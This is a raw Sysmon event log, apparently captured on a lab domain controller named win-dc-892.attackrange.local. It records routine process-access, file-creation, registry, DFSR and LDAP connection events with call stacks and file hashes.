12:06:09.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000009962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:09.296{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000009985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:10.936{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7C421B046C99FEE56DFA8859C5F8EE35,SHA256=1D7BFDB4A4C8E87B441A4D23EF9E4AC1679F7DAD16AC9D481737D083C93476EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:10.686{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89D0ABC298DB6861421A0CF5D899CD7D,SHA256=A29BE379EDAC53D6079F01C07DACFB74A11D932F41B360BBCF493603DB9AC968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:11.702{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58777DE40996C4F8E9E5FD9D9CE7FEC5,SHA256=4BFA050FB8FED8C426D7A83D8E5AAD2D1C6B9F0B595FB085C3A14C098613905D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:11.030{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:11.030{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000009990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:12.748{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C5295B962B6722B32576706AC9011FC,SHA256=CE3EF6B71D57AC0A0ED2D2D9D8CE5DB17C9525911BDB3FC07C025326ABFDD741,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:12.326{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=18AF120D4531285E7418381D58703DB5,SHA256=B381E195461ADC9F3F7F478B49394D44243B9CBE5DC4A9A3A79A6C9C792A13BA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000009991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:13.779{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90F121996622A3BB765F2BE80F8B050E,SHA256=A735A067D6E48A3D468A21A4486819E6DD24E24425FC99BF97C4D078AC5120F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.810{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48A0BA4587C19DB1F2DF9A570C17CA6B,SHA256=328382C64DFD1DD735242B41BE2ECF35953D5CB3DA03F30698837B2DD02B2265,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.716{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2EA58FABDBA3D69D133A324831274F89,SHA256=9FED9E0FE153F5478A6F46B6AA5C68B2AF31D998AA3CF5B54D7F82A331E4B5AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.701{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E09587E882E3CA9E092E04ACF3BB3A2E,SHA256=9679E867D1D5B741F0632740E0123B53540C4010797972C38D7380C2EC5C521B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.669{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E09587E882E3CA9E092E04ACF3BB3A2E,SHA256=9679E867D1D5B741F0632740E0123B53540C4010797972C38D7380C2EC5C521B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.669{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=54D4FB4CECE767138E0CC9729BC1D798,SHA256=4A3FBF81CC56644DE7BEED1BE6E221E6B8D88178E487E13EAD9B774F26C068CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.638{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DFS ReplicationMD5=B5E71D215F710674AC4A1A3A4D5E1262,SHA256=27AEE020C8B304D0AA8C36FD40E182B0D2CFA92A30A56E883813DAB0D2B30E10,IMPHASH=00000000000000000000000000000000falsetrue 17141700x800000000000000010001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:06:14.638{266CAFBE-647D-6064-3100-00000000AE01}2672\Winsock2\CatalogChangeListener-a70-0C:\Windows\system32\DFSRs.exe 
10341000x800000000000000010000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.638{266CAFBE-646C-6064-1200-00000000AE01}11961468C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000009999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:14.623{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.623{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
13241300x80000000000000009997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:06:14.591{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\69825A4F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_69825A4F-0000-0000-0000-100000000000.XML 13241300x80000000000000009996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:06:14.591{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Config SourceDWORD (0x00000001) 13241300x80000000000000009995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:06:14.591{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\D1286CDE-9764-40EF-8307-AEB9B8BDF7DB\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_D1286CDE-9764-40EF-8307-AEB9B8BDF7DB.XML 23542300x80000000000000009994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.576{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DFS ReplicationMD5=289EDC9A13E304519631C7C095757F5F,SHA256=CC06A31A7347D1D89A5B1E7BABB0FE102BE34698D6973439759436A8D8B5E500,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000009993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.560{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating 
SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 354300x80000000000000009992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:12.493{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53653-false10.0.1.12-8000- 23542300x800000000000000010010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.825{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D0095F24D09B689B331BAED94277408,SHA256=720D9881CB2BDB0DE22A443C0DF9472838B434D3009687F32ECDC03EB8C15CD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.201{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A8F35FB1853726D2A7285DCC9C44DAE,SHA256=DF89B85D1415DC4525AD7C8137C3313F0CF29A139326B4B4B7C938D54285AD16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.201{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58C3D50FDCC09A976A2B73B92371D5EA,SHA256=899A3BF8284D844BD8843FFF1263AE687FB3A864A806855294618F80F234C5BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:16.841{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFB65FA51FDAAF9C8961AF7A51031ACA,SHA256=B6901796A66728FB267F8FA31E9230BAA9B1B1D00615C10A20F4696C1F5599B6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.130{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53665-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.130{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53665-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.121{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53664-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.121{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT 
AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53664-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.019{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53663-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.019{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53663-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.014{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53662-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:15.014{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53662-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.972{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53660-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 
354300x800000000000000010024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.972{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53660-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.960{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53659-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.960{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53659-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 22542200x800000000000000010021Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.933{266CAFBE-647D-6064-3100-00000000AE01}2672win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 354300x800000000000000010020Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.938{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53658-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x800000000000000010019Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:14.938{266CAFBE-647D-6064-3100-00000000AE01}2672C:\Windows\System32\dfsrs.exeNT 
